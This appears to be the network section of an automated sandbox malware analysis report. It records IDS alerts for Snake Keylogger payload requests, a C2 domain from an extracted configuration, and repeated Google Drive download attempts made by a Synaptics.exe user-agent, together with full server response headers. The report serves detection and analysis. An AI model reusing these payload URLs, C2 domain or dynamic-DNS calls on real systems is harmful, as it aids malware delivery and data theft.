                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49788 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49832 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49881 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49800 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49893 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49820 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49846 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49833 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49854 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49845 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49864 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49871 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49894 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49862 -> 142.250.185.78:443
                              Source: Network trafficSuricata IDS: 2044887 - Severity 1 - ET MALWARE Snake Keylogger Payload Request (GET) : 192.168.2.6:49880 -> 142.250.185.78:443
                              Source: Malware configuration extractorURLs: xred.mooo.com
                              Source: unknownDNS query: name: freedns.afraid.org
                              Source: Joe Sandbox ViewIP Address: 172.111.138.100 172.111.138.100
                              Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                              Source: Joe Sandbox ViewASN Name: VOXILITYGB VOXILITYGB
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: unknownTCP traffic detected without corresponding DNS query: 172.111.138.100
                              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                              Source: C:\Users\user\AppData\Roaming\Windata\TXAASJ.exeCode function: 9_2_00EA550C InternetReadFile,InternetQueryDataAvailable,InternetReadFile,9_2_00EA550C
                              Source: global trafficHTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeHost: docs.google.comCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global trafficHTTP traffic detected: GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1User-Agent: Synaptics.exeCache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache | Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk
                              Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache | Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-
                              Source: global traffic | HTTP traffic detected: GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1 | User-Agent: Synaptics.exe | Host: docs.google.com | Cache-Control: no-cache | Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7
                              Source: global traffic | HTTP traffic detected: GET /api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978 HTTP/1.1 | User-Agent: MyApp | Host: freedns.afraid.org | Cache-Control: no-cache
                              Source: global traffic | DNS traffic detected: DNS query: docs.google.com
                              Source: global traffic | DNS traffic detected: DNS query: xred.mooo.com
                              Source: global traffic | DNS traffic detected: DNS query: freedns.afraid.org
                              Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5NjZUDpzwGZ-E764jvD7gqnznCYxkn8gCFgiob_B6Ou7P6LRXS_uat4TkQVgLcIIeiContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:39 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-d6BqksB8bJk21Leg9h3EQQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=Yuz7RKwQEmloTaTTA976nrnkFQ7N5Ob3pnCam2NVZl0sB_Ud02smlILDTDMmhSw5alN9qYua8UwJYg8uP4GqMg-ydOrOsxWCz2mBh0SXqRIaBniutRP5BkN5ceAVzF4EhGF6V34nDgJ3XudT8SM4aVp_Cp4zGI-RnpiVAHIlijow4CMrQ_jiekk; expires=Tue, 01-Jul-2025 10:40:38 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC62M3jCQXortMmokBrUGlmUrsZKeo07pK8TwJB3waK_8GFoyabIjZXWvr6RqUF9Dr-fxIIkGhwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:39 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Cross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce--WplRxNcX56DZt7mI1z9dg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=e0MMv7cRp-grNJHjXrhAU_LA_LGSTbCZR5NB_desh_k7u6ozgnbyf-rkVtUkhybO-lKzptPcJJZjB-xAJNIFGwk0KWu6Y9PwmuNL9n0wmFo0cAoquhAgWdfbz5KTJ_SR5jmhs53G5hp-aFYyyktNAAdNZkhq4RLUKINiF2gb5PdPOd-hORFA-PF-; expires=Tue, 01-Jul-2025 10:40:39 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Rml3YnEOq65rDZjkua5UqhaROy1ATmupOuW1IFeKsAp_f2ugh5JJlr0nP00wV8mFmContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:40 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'report-sample' 'nonce-aAJppFj6bCC4l6Zf1EC6yg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerSet-Cookie: NID=520=XEpDunbM2jQWLDhJ4ZLTX75bwqESkJo47WZJ2ujDLcGVKux2c-y7Jt7SY2aovNvhVjyCrbsCNa1YWwhYHv1wufDt8UkHy2EpzgZJne1VtYUPaU7sFeHdum4NnesSqtEqek7CrfPHvlEkK3tH86_IjZKl8iznNzk3DIi_ygFA8ncsOsTOg97wWyr7; expires=Tue, 01-Jul-2025 10:40:40 GMT; path=/; domain=.google.com; HttpOnlyAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC78uzettXvUXXFIJixkANh297TWjhG6OYsKypmDUqXiVOn_rOyo--t_-VaUr9nybv1VContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:40 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-EfxtQkcdyGYydNKYbQeA8w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7xEof4pDMmkxt_skBhEHWxQjELhKVQKgpdujZDIBk3nTAlTM0QS8DIBG8ZZ3b2QDJjContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:41 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-f52LIjg0UGkvyMRF-ahcfQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC76cqJ3W25Jf1booRyStDEV_5AI1mbZPmTsBrO-1sHDjuqS0ngSxnD17p6MmIa8_j_YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:41 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-2H8NIJIPIxxXHn2Uold6fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6XqTKpAo8Mf7zqzLQYBwoBraZhle8kX_FUVcvq5PTSxbxoyIY9LtffNnk5hHN_N7v9Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:43 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-uAzPdoq_joE27Lj2D-nmdg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6m3OBeC9iOe3ClVYOpwg_Fa6toqdSbJjE_AO1Bn9V1d79laz448qBqUopzjWZprPzgPihTV1YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:43 GMTContent-Security-Policy: script-src 'report-sample' 'nonce-9sP9v-uIb4I-kf1aiYy1Jw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5va-gYexViE6-FtIzOZPQ2BNpD1s3RTWRfark6q3muu_XGaDNDpoLmoAn5x3HlxHIQISUXRiwContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:45 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-Pm3g7F377XXyk0ZJsPa0Iw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5lDUluWjpr3icEoJTIspjwaL921ropBmxiIdkDPQyJQZ9eVefFMw8gZJWCnaZA4loNWgmrtLUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:45 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-zH9V_vV7xkUPDx2Cv6nqrw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4ZJCzwavFvV_jXkamolU4IcoO7y94mslB5IkprvD56BsXczWtSZpis6lfxTOSooCBSP3DrYIUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:47 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'report-sample' 'nonce-yH-Ss2849tMJ2ye23x4UlA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6ECm1TxO9_Y_R_zeUMUtx_dEWqKdl9Je9KGTkZKb23w7txD3jRMlS8buy3OaPFGUepContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:47 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-_YhG6DZjERxiMrIanbQBxQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7zw3Cy7V4RUsdhBpaaYUUlA79ahimYQjFgdyjqeOjvHujYtRsMsaegWWjQKB3nxsyMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:48 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-D1nQFe1mu63h61C2NEWQ-g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
                              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC6Jhg2hCTUy3ese7-BAkYlQQmrcsKh-dT0_DMpkMJdyOSIav5yCzWAVV_z9377v5xnH3iUpesUContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Mon, 30 Dec 2024 10:40:49 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'report-sample' 'nonce-QnELD4iSBQ4z4wHvxTmLhg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
